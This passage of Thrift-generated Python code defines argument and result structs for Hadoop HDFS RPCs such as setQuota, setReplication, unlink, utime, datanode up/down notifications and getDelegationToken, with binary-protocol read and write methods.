    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    # None-valued fields are omitted from the wire entirely.
    oprot.writeStructBegin('setQuota_args')
    if self.path is not None:
      oprot.writeFieldBegin('path', TType.STRING, 1)
      oprot.writeString(self.path)
      oprot.writeFieldEnd()
    if self.namespaceQuota is not None:
      oprot.writeFieldBegin('namespaceQuota', TType.I64, 2)
      oprot.writeI64(self.namespaceQuota)
      oprot.writeFieldEnd()
    if self.diskspaceQuota is not None:
      oprot.writeFieldBegin('diskspaceQuota', TType.I64, 3)
      oprot.writeI64(self.diskspaceQuota)
      oprot.writeFieldEnd()
    if self.ctx is not None:
      oprot.writeFieldBegin('ctx', TType.STRUCT, 10)
      self.ctx.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # No required fields to check.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class setQuota_result(object):
  """Thrift-generated result struct for setQuota (void return).

  Do not edit by hand.

  Attributes:
   - err: IOException raised by the server (field id 1)
  """

  # thrift_spec row layout: (field id, wire type, name, nested type info, default).
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'err', (hadoop.api.common.ttypes.IOException, hadoop.api.common.ttypes.IOException.thrift_spec), None, ), # 1
  )

  def __init__(self, err=None,):
    self.err = err

  def read(self, iprot):
    # C-accelerated decode fast path when protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.err = hadoop.api.common.ttypes.IOException()
          self.err.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    # C-accelerated encode fast path.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('setQuota_result')
    if self.err is not None:
      oprot.writeFieldBegin('err', TType.STRUCT, 1)
      self.err.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # No required fields to check.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class setReplication_args(object):
  """Thrift-generated argument struct for setReplication.

  Do not edit by hand.

  Attributes:
   - ctx: request context (field id 10)
   - path: Path of the file.
   - replication: New replication factor.
  """

  # thrift_spec row layout: (field id, wire type, name, nested type info, default).
  # None entries pad unused field-id slots.
  thrift_spec = (
    None, # 0
    (1, TType.STRING, 'path', None, None, ), # 1
    (2, TType.I16, 'replication', None, None, ), # 2
    None, # 3
    None, # 4
    None, # 5
    None, # 6
    None, # 7
    None, # 8
    None, # 9
    (10, TType.STRUCT, 'ctx', (hadoop.api.common.ttypes.RequestContext, hadoop.api.common.ttypes.RequestContext.thrift_spec), None, ), # 10
  )

  def __init__(self, ctx=None, path=None, replication=None,):
    self.ctx = ctx
    self.path = path
    self.replication = replication

  def read(self, iprot):
    # C-accelerated decode fast path when protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Slow path: field-by-field decode; unknown field ids are skipped.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 10:
        if ftype == TType.STRUCT:
          self.ctx = hadoop.api.common.ttypes.RequestContext()
          self.ctx.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRING:
          self.path = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.I16:
          self.replication = iprot.readI16();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    # C-accelerated encode fast path.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    # None-valued fields are omitted from the wire entirely.
    oprot.writeStructBegin('setReplication_args')
    if self.path is not None:
      oprot.writeFieldBegin('path', TType.STRING, 1)
      oprot.writeString(self.path)
      oprot.writeFieldEnd()
    if self.replication is not None:
      oprot.writeFieldBegin('replication', TType.I16, 2)
      oprot.writeI16(self.replication)
      oprot.writeFieldEnd()
    if self.ctx is not None:
      oprot.writeFieldBegin('ctx', TType.STRUCT, 10)
      self.ctx.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # No required fields to check.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class setReplication_result(object):
  """Thrift-generated result struct for setReplication.

  Do not edit by hand.

  Attributes:
   - success: bool return value (field id 0)
   - err: IOException raised by the server (field id 1)
  """

  # thrift_spec row layout: (field id, wire type, name, nested type info, default).
  thrift_spec = (
    (0, TType.BOOL, 'success', None, None, ), # 0
    (1, TType.STRUCT, 'err', (hadoop.api.common.ttypes.IOException, hadoop.api.common.ttypes.IOException.thrift_spec), None, ), # 1
  )

  def __init__(self, success=None, err=None,):
    self.success = success
    self.err = err

  def read(self, iprot):
    # C-accelerated decode fast path when protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.BOOL:
          self.success = iprot.readBool();
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRUCT:
          self.err = hadoop.api.common.ttypes.IOException()
          self.err.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    # C-accelerated encode fast path.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('setReplication_result')
    if self.success is not None:
      oprot.writeFieldBegin('success', TType.BOOL, 0)
      oprot.writeBool(self.success)
      oprot.writeFieldEnd()
    if self.err is not None:
      oprot.writeFieldBegin('err', TType.STRUCT, 1)
      self.err.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # No required fields to check.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class unlink_args(object):
  """Thrift-generated argument struct for unlink.

  Do not edit by hand.

  Attributes:
   - ctx: request context (field id 10)
   - path: Path of the file or directory.
   - recursive: Delete a non-empty directory recursively.
  """

  # thrift_spec row layout: (field id, wire type, name, nested type info, default).
  # None entries pad unused field-id slots.
  thrift_spec = (
    None, # 0
    (1, TType.STRING, 'path', None, None, ), # 1
    (2, TType.BOOL, 'recursive', None, None, ), # 2
    None, # 3
    None, # 4
    None, # 5
    None, # 6
    None, # 7
    None, # 8
    None, # 9
    (10, TType.STRUCT, 'ctx', (hadoop.api.common.ttypes.RequestContext, hadoop.api.common.ttypes.RequestContext.thrift_spec), None, ), # 10
  )

  def __init__(self, ctx=None, path=None, recursive=None,):
    self.ctx = ctx
    self.path = path
    self.recursive = recursive

  def read(self, iprot):
    # C-accelerated decode fast path when protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Slow path: field-by-field decode; unknown field ids are skipped.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 10:
        if ftype == TType.STRUCT:
          self.ctx = hadoop.api.common.ttypes.RequestContext()
          self.ctx.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRING:
          self.path = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.BOOL:
          self.recursive = iprot.readBool();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    # C-accelerated encode fast path.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    # None-valued fields are omitted from the wire entirely.
    oprot.writeStructBegin('unlink_args')
    if self.path is not None:
      oprot.writeFieldBegin('path', TType.STRING, 1)
      oprot.writeString(self.path)
      oprot.writeFieldEnd()
    if self.recursive is not None:
      oprot.writeFieldBegin('recursive', TType.BOOL, 2)
      oprot.writeBool(self.recursive)
      oprot.writeFieldEnd()
    if self.ctx is not None:
      oprot.writeFieldBegin('ctx', TType.STRUCT, 10)
      self.ctx.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # No required fields to check.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class unlink_result(object):
  """Thrift-generated result struct for unlink.

  Do not edit by hand.

  Attributes:
   - success: bool return value (field id 0)
   - err: IOException raised by the server (field id 1)
  """

  # thrift_spec row layout: (field id, wire type, name, nested type info, default).
  thrift_spec = (
    (0, TType.BOOL, 'success', None, None, ), # 0
    (1, TType.STRUCT, 'err', (hadoop.api.common.ttypes.IOException, hadoop.api.common.ttypes.IOException.thrift_spec), None, ), # 1
  )

  def __init__(self, success=None, err=None,):
    self.success = success
    self.err = err

  def read(self, iprot):
    # C-accelerated decode fast path when protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.BOOL:
          self.success = iprot.readBool();
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRUCT:
          self.err = hadoop.api.common.ttypes.IOException()
          self.err.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    # C-accelerated encode fast path.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('unlink_result')
    if self.success is not None:
      oprot.writeFieldBegin('success', TType.BOOL, 0)
      oprot.writeBool(self.success)
      oprot.writeFieldEnd()
    if self.err is not None:
      oprot.writeFieldBegin('err', TType.STRUCT, 1)
      self.err.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # No required fields to check.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class utime_args(object):
  """Thrift-generated argument struct for utime.

  Do not edit by hand.

  Attributes:
   - ctx: request context (field id 10)
   - path: Path of the file or directory.
   - atime: Access time in milliseconds since 1970-01-01 00:00 UTC
   - mtime: Modification time in milliseconds since 1970-01-01 00:00 UTC
  """

  # thrift_spec row layout: (field id, wire type, name, nested type info, default).
  # None entries pad unused field-id slots.
  thrift_spec = (
    None, # 0
    (1, TType.STRING, 'path', None, None, ), # 1
    (2, TType.I64, 'atime', None, None, ), # 2
    (3, TType.I64, 'mtime', None, None, ), # 3
    None, # 4
    None, # 5
    None, # 6
    None, # 7
    None, # 8
    None, # 9
    (10, TType.STRUCT, 'ctx', (hadoop.api.common.ttypes.RequestContext, hadoop.api.common.ttypes.RequestContext.thrift_spec), None, ), # 10
  )

  def __init__(self, ctx=None, path=None, atime=None, mtime=None,):
    self.ctx = ctx
    self.path = path
    self.atime = atime
    self.mtime = mtime

  def read(self, iprot):
    # C-accelerated decode fast path when protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Slow path: field-by-field decode; unknown field ids are skipped.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 10:
        if ftype == TType.STRUCT:
          self.ctx = hadoop.api.common.ttypes.RequestContext()
          self.ctx.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRING:
          self.path = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.I64:
          self.atime = iprot.readI64();
        else:
          iprot.skip(ftype)
      elif fid == 3:
        if ftype == TType.I64:
          self.mtime = iprot.readI64();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    # C-accelerated encode fast path.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    # None-valued fields are omitted from the wire entirely.
    oprot.writeStructBegin('utime_args')
    if self.path is not None:
      oprot.writeFieldBegin('path', TType.STRING, 1)
      oprot.writeString(self.path)
      oprot.writeFieldEnd()
    if self.atime is not None:
      oprot.writeFieldBegin('atime', TType.I64, 2)
      oprot.writeI64(self.atime)
      oprot.writeFieldEnd()
    if self.mtime is not None:
      oprot.writeFieldBegin('mtime', TType.I64, 3)
      oprot.writeI64(self.mtime)
      oprot.writeFieldEnd()
    if self.ctx is not None:
      oprot.writeFieldBegin('ctx', TType.STRUCT, 10)
      self.ctx.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # No required fields to check.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class utime_result(object):
  """Thrift-generated result struct for utime (void return).

  Do not edit by hand.

  Attributes:
   - err: IOException raised by the server (field id 1)
  """

  # thrift_spec row layout: (field id, wire type, name, nested type info, default).
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'err', (hadoop.api.common.ttypes.IOException, hadoop.api.common.ttypes.IOException.thrift_spec), None, ), # 1
  )

  def __init__(self, err=None,):
    self.err = err

  def read(self, iprot):
    # C-accelerated decode fast path when protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.err = hadoop.api.common.ttypes.IOException()
          self.err.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    # C-accelerated encode fast path.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('utime_result')
    if self.err is not None:
      oprot.writeFieldBegin('err', TType.STRUCT, 1)
      self.err.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # No required fields to check.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class datanodeUp_args(object):
  """Thrift-generated argument struct for datanodeUp.

  Do not edit by hand.

  Attributes:
   - name: <host name>:<port number> of the datanode
   - storage: the storage id of the datanode
   - thriftPort: Thrift port of the datanode
  """

  # thrift_spec row layout: (field id, wire type, name, nested type info, default).
  thrift_spec = (
    None, # 0
    (1, TType.STRING, 'name', None, None, ), # 1
    (2, TType.STRING, 'storage', None, None, ), # 2
    (3, TType.I32, 'thriftPort', None, None, ), # 3
  )

  def __init__(self, name=None, storage=None, thriftPort=None,):
    self.name = name
    self.storage = storage
    self.thriftPort = thriftPort

  def read(self, iprot):
    # C-accelerated decode fast path when protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Slow path: field-by-field decode; unknown field ids are skipped.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRING:
          self.name = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRING:
          self.storage = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 3:
        if ftype == TType.I32:
          self.thriftPort = iprot.readI32();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    # C-accelerated encode fast path.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    # None-valued fields are omitted from the wire entirely.
    oprot.writeStructBegin('datanodeUp_args')
    if self.name is not None:
      oprot.writeFieldBegin('name', TType.STRING, 1)
      oprot.writeString(self.name)
      oprot.writeFieldEnd()
    if self.storage is not None:
      oprot.writeFieldBegin('storage', TType.STRING, 2)
      oprot.writeString(self.storage)
      oprot.writeFieldEnd()
    if self.thriftPort is not None:
      oprot.writeFieldBegin('thriftPort', TType.I32, 3)
      oprot.writeI32(self.thriftPort)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # No required fields to check.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class datanodeUp_result(object):
  """Thrift-generated result struct for datanodeUp (void, no exceptions).

  Do not edit by hand.
  """

  # Empty spec: this one-way-style result carries no fields.
  thrift_spec = (
  )

  def read(self, iprot):
    # C-accelerated decode fast path when protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Slow path: consume and discard any fields until STOP.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    # C-accelerated encode fast path.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('datanodeUp_result')
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # No required fields to check.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class datanodeDown_args(object):
  """Thrift-generated argument struct for datanodeDown.

  Do not edit by hand.

  Attributes:
   - name: <host name>:<port number> of the datanode
   - storage: the storage id of the datanode
   - thriftPort: Thrift port of the datanode
  """

  # thrift_spec row layout: (field id, wire type, name, nested type info, default).
  thrift_spec = (
    None, # 0
    (1, TType.STRING, 'name', None, None, ), # 1
    (2, TType.STRING, 'storage', None, None, ), # 2
    (3, TType.I32, 'thriftPort', None, None, ), # 3
  )

  def __init__(self, name=None, storage=None, thriftPort=None,):
    self.name = name
    self.storage = storage
    self.thriftPort = thriftPort

  def read(self, iprot):
    # C-accelerated decode fast path when protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Slow path: field-by-field decode; unknown field ids are skipped.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRING:
          self.name = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRING:
          self.storage = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 3:
        if ftype == TType.I32:
          self.thriftPort = iprot.readI32();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    # C-accelerated encode fast path.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    # None-valued fields are omitted from the wire entirely.
    oprot.writeStructBegin('datanodeDown_args')
    if self.name is not None:
      oprot.writeFieldBegin('name', TType.STRING, 1)
      oprot.writeString(self.name)
      oprot.writeFieldEnd()
    if self.storage is not None:
      oprot.writeFieldBegin('storage', TType.STRING, 2)
      oprot.writeString(self.storage)
      oprot.writeFieldEnd()
    if self.thriftPort is not None:
      oprot.writeFieldBegin('thriftPort', TType.I32, 3)
      oprot.writeI32(self.thriftPort)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # No required fields to check.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class datanodeDown_result(object):
  """Thrift-generated result struct for datanodeDown (void, no exceptions).

  Do not edit by hand.
  """

  # Empty spec: this result carries no fields.
  thrift_spec = (
  )

  def read(self, iprot):
    # C-accelerated decode fast path when protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Slow path: consume and discard any fields until STOP.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    # C-accelerated encode fast path.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('datanodeDown_result')
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # No required fields to check.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class getDelegationToken_args(object):
  """Thrift-generated argument struct for getDelegationToken.

  Do not edit by hand.

  Attributes:
   - ctx: request context (field id 10)
   - renewer: principal allowed to renew the token (field id 1)
  """

  # thrift_spec row layout: (field id, wire type, name, nested type info, default).
  # None entries pad unused field-id slots.
  thrift_spec = (
    None, # 0
    (1, TType.STRING, 'renewer', None, None, ), # 1
    None, # 2
    None, # 3
    None, # 4
    None, # 5
    None, # 6
    None, # 7
    None, # 8
    None, # 9
    (10, TType.STRUCT, 'ctx', (hadoop.api.common.ttypes.RequestContext, hadoop.api.common.ttypes.RequestContext.thrift_spec), None, ), # 10
  )

  def __init__(self, ctx=None, renewer=None,):
    self.ctx = ctx
    self.renewer = renewer

  def read(self, iprot):
    # C-accelerated decode fast path when protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Slow path: field-by-field decode; unknown field ids are skipped.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 10:
        if ftype == TType.STRUCT:
          self.ctx = hadoop.api.common.ttypes.RequestContext()
          self.ctx.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRING:
          self.renewer = iprot.readString();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    # C-accelerated encode fast path.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    # None-valued fields are omitted from the wire entirely.
    oprot.writeStructBegin('getDelegationToken_args')
    if self.renewer is not None:
      oprot.writeFieldBegin('renewer', TType.STRING, 1)
      oprot.writeString(self.renewer)
      oprot.writeFieldEnd()
    if self.ctx is not None:
      oprot.writeFieldBegin('ctx', TType.STRUCT, 10)
      self.ctx.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # No required fields to check.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class getDelegationToken_result(object):
  """Thrift-generated result struct for getDelegationToken.

  Do not edit by hand.

  Attributes:
   - success: ThriftDelegationToken return value (field id 0)
   - err: IOException raised by the server (field id 1)
  """

  # thrift_spec row layout: (field id, wire type, name, nested type info, default).
  thrift_spec = (
